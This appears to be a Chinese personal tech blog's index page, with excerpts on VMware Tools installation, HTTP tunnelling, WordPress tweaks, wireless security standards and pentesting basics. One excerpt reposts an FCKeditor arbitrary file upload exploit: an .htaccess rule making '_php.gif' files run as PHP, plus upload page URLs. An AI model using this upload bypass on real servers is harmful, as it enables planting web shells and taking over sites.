Chinadu's Blog

1. 创建文件链接

# ln -s /usr/src/linux /lib/modules/2.6.39.4/build

2. 复制VMwareTools安装文件并执行安装程序

# tar zxpf VMwareTools-.tar.gz
# cd vmware-tools-distrib/
# ./vmware-install.pl

如果遇到错误：

Error: Unable to execute "/usr/bin/vmware-uninstall-tools.pl

阅读全文...

基本概念不多解释了，直入主题。GNU HTTP Tunnel (http://www.nocrew.org/software/httptunnel.html)是一个开源的http-tunnel项目，包括了tunnel server(hts命令)和tunnel client(htc命令)，有(x)nix和windows版本。我们就用它来建立自己的tunnel。
阅读全文...

以前添加代码以屏蔽自动保存及修订的方法不能使用了。

WordPress 3.2 文章自动保存草稿和修订的关闭方法如下：

打开你正在使用主题文件夹下面的functions.php文件，在合适地方添加以下代码即可：

/* 移除自动保存和修订版本 */

remove_action('pre_post_update', 'wp_save_post_revision' );

add_action( 'wp_print_scripts', 'disable_autosave' );

function disable_autosave() {

wp_deregister_script('autosave');

}

现在的企业网络不光有固定的线路型局域网，也有无线局域网。其实无论是有线网络还是无线网络都同样面临着安全问题。曾经有位黑客这样说过：只要是没经过改造的默认网络设置，那就是一道假墙，可以想来就来，想走就走……

　　企业无线网络为何不安全

　　由于无线网络的接入根本不需要网线的连接，因此，一个黑客拿取一个蹭网器，就能增加网络信号并连接到企业内网中，然后通过各种手法技巧渗入到全网，从而可以控制整个企业的内部局域网，下面总结出了企业无线网络的漏洞所在。

　　无线网络暴露性强，相对于有线网络来说无线网络只是依靠电波来传送与接收，只要恶意用户拥有一定的无线网络知识，那么企业无线网络的安全性就相当成问题。入侵者可以通过高灵敏的接收设备来进行破坏与入侵。
阅读全文...

无线WLAN安全规范都包括哪些内容呢？这里我们就来详细介绍一下吧。首先我们要知道无线WLAN安全规范，大致有三种，分别是WEP、WPA和WAPI。那么针对每一种我们都来看看具体的内容吧。

　　无线WLAN安全规范1：WEP

WEP(WiredEquivalentPrivacy)是802.11b采用的安全标准，用于提供一种加密机制，保护数据链路层的安全，使无线网络 WLAN的数据传输安全达到与有线LAN相同的级别。WEP采用RC4算法实现对称加密。通过预置在AP和无线网卡间共享密钥。在通信时，WEP标准要求 传输程序创建一个特定于数据包的初始化向量(IV)，将其与预置密钥相组合，生成用于数据包加密的加密密钥。接收程序接收此初始化向量，并将其与本地预置 密钥相结合，恢复出加密密钥。

WEP允许40bit长的密 钥，这对于大部分应用而言都太短。同时，WEP不支持自动更换密钥，所有密钥必须手动重设，这导致了相同密钥的长期重复使用。第三，尽管使用了初始化向 量，但初始化向量被明文传递，并且允许在5个小时内重复使用，对加强密钥强度并无作用。此外，WEP中采用的RC4算法被证明是存在漏洞的。综上，密钥设 置的局限性和算法本身的不足使得WEP存在较明显的安全缺陷，WEP提供的安全保护效果，只能被定义为“聊胜于无”。

阅读全文...

发现目前号称最安全的Wi-Fi加密和认证标准WPA2的漏洞或许只是个时间问题。这不，一些无线安全研究人员最近就声称，他们已经发现了WPA2安全协议的一个漏洞。

不怀好意的内部人士可利用这个名叫“Hole 196”的漏洞进行攻击，该漏洞是无线安全公司AirTight网络的研究人员发现的。该漏洞之所以被叫做这个名字，颇具讽刺意味，它指的是IEEE 802.11标准的第196页，该页自称无线安全的漏洞从此被埋葬了。

AirTight称，Hole 196漏洞可为中间人类型的攻击提供帮助，机构内部获得授权的Wi-Fi用户可利用该漏洞对安全协议进行破解，盗取他人的隐私数据，向网络注入恶意流量，从而可危及其他获得认证的、使用开源软件的设备。
阅读全文...

在部署无线接入点时，为了防止各种常见故障的发生，用户应该掌握一些简单的基本注意事项。为了确保部署过程不出现问题，本文中总结出了从实践中获得的十条经验。

近年来，无线设备制造商始终致力于让无线接入点设备的部署趋于简单化，这将使总体的部署工程变得十分简便。但对于用户来说，在实际部署当中仍然需要注意几项规范。文章下面所介绍的，就是在实际部署无线接入点时应该遵循的几项基本原则。

　　1. 接入点的部署位置不应位于金属结构附近

在部署无线接入点时，用户需要注意到部署的实际位置不应该遭遇无线电干扰。曾经有这样一个案例，客户发现无线网络无法正常工作后，向相关部门进行了咨 询，在提供了接入点所在的具体位置后，技术人员发现该用户的接入点设备正好位于金属屋顶下的钢梁顶部。因此遍布周围的金属材料对无线电信号造成了严重的干 扰。最终通过对接入点位置的调整后，之前存在的问题马上就得到了解决。所以，我们在布设无线接入点的时候要尽量避免将设备部署在金属结构的附近。

阅读全文...

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:

<FilesMatch "_php.gif">

SetHandler application/x-httpd-php

</FilesMatch>

2.实用编辑器上传htaccess文件:

http://www.4shell.org/FCKeditor/editor/filemanager/upload/test.html

http://www.4shell.org/FCKeditor/editor/filemanager/browser/default/connectors/test.html

阅读全文...

一、渗透测试概念
　 渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。
渗透测试还具有的两个显著特点是：
　 渗透测试是一个渐进的并且逐步深入的过程。
　 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。
　 渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现系统最脆弱的环节，能直观的让管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。
阅读全文...

看SECURITY日志的详细信息：
C:\Windows\system32>wevtutil gl security

name: security
enabled: true
type: Admin
owningPublisher:
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0×5;;;BA)(A;;0×1;;;S-1-5-32-573)
logging:
  logFileName: %SystemRoot%\System32\Winevt\Logs\security.evtx
  retention: false
  autoBackup: false
  maxSize: 20971520
publishing:
  fileMax: 1

阅读全文...

升级了chrome, 提示:

Google Chrome can not be run as root

解决办法：在启动命令中加入–user-data-dir参数，设置到一个目录就行了

/opt/google/chrome/google-chrome %U –user-data-dir=/root/.config/chromium